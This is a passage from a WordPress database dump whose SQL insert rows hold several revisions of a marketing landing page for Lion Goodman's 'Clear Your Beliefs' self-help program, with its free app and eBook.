 This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice. </p><p style="text-align: center;">Help your clients clear their beliefs so they can move their lives forward.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-23 15:17:08', '2014-10-23 20:17:08', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1583, 2, '2014-10-23 17:14:46', '2014-10-23 22:14:46', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD the FREE iClearIt App</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nComplete Program\n<p style="text-align: center"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center">Eliminate Beliefs that\nBlock Your Abundance,\nInterfere with Your Relationships,\nor Prevent You from Living the Life You Want\n\n<p style="text-align: center;margin-bottom: -5px"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nWhat You Can Accomplish with <em>Clear Your Beliefs</em>\n\nFinally release pain and hurts from the past\nClear resistance that stops you from taking action\nOpen yourself to new possibilities of love, work and success\nEliminate the blocks that prevent you from getting what you want\nFind your true purpose and express your true magnificence\nPermanently delete whatever’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nHow and Why It Works\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice. </p><p style="text-align: center;">Help your clients clear their beliefs so they can move their lives forward.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-23 17:14:46', '2014-10-23 22:14:46', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1582, 2, '2014-10-23 17:11:42', '2014-10-23 22:11:42', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD the FREE iClearIt App</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nComplete Program\n<p style="text-align: center"><strong>Learn about</strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center">Eliminate the Beliefs that\nBlock Your Abundance,\nInterfere with Your Relationships,\nand Prevent You from Living the Life You Want\n\n<p style="text-align: center;margin-bottom: -5px"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nWhat You Can Accomplish with <em>Clear Your Beliefs</em>\n\nFinally release pain and hurts from the past\nClear resistance that stops you from taking action\nOpen yourself to new possibilities of love, work and success\nEliminate the blocks that prevent you from getting what you want\nFind your true purpose and express your true magnificence\nPermanently delete whatever’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nHow and Why It Works\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice. </p><p style="text-align: center;">Help your clients clear their beliefs so they can move their lives forward.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-23 17:11:42', '2014-10-23 22:11:42', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1586, 2, '2014-10-23 17:32:52', '2014-10-23 22:32:52', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD the FREE iClearIt App</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nComplete Program\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nBenefits of the <em>Clear Your Beliefs</em> Program\n\nFinally release pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear what stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice. </p><p style="text-align: center;">Help your clients clear their beliefs so they can move their lives forward.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-23 17:32:52', '2014-10-23 22:32:52', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1584, 2, '2014-10-23 17:18:15', '2014-10-23 22:18:15', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD the FREE iClearIt App</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nComplete Program\n<p style="text-align: center"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, and\nStop You from Living a Great Life\n\n<p style="text-align: center;margin-bottom: -5px"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nWhat You Can Accomplish with <em>Clear Your Beliefs</em>\n\nFinally release pain and hurts from the past\nClear resistance that stops you from taking action\nOpen yourself to new possibilities of love, work and success\nEliminate the blocks that prevent you from getting what you want\nFind your true purpose and express your true magnificence\nPermanently delete whatever’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nHow and Why It Works\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice. </p><p style="text-align: center;">Help your clients clear their beliefs so they can move their lives forward.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-23 17:18:15', '2014-10-23 22:18:15', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1585, 2, '2014-10-23 17:20:39', '2014-10-23 22:20:39', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD the FREE iClearIt App</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nComplete Program\n<p style="text-align: center"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center;margin-bottom: -5px"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nWhat You Can Accomplish with <em>Clear Your Beliefs</em>\n\nFinally release pain and hurts from the past\nClear resistance that stops you from taking action\nOpen yourself to new possibilities of love, work and success\nEliminate the blocks that prevent you from getting what you want\nFind your true purpose and express your true magnificence\nPermanently delete whatever’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nHow and Why It Works\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice. </p><p style="text-align: center;">Help your clients clear their beliefs so they can move their lives forward.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-23 17:20:39', '2014-10-23 22:20:39', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1587, 2, '2014-10-23 17:38:55', '2014-10-23 22:38:55', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD the FREE iClearIt App</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nComplete Program\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nThe <em>Clear Your Beliefs</em> Program can help you:\n\nFinally release pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear what stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe Clear Your Beliefs Program eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, and step-by-step, through the entire process.\nUnlike other methods, the changes you make are permanent – the old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice. </p><p style="text-align: center;">Help your clients clear their beliefs so they can move their lives forward.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" 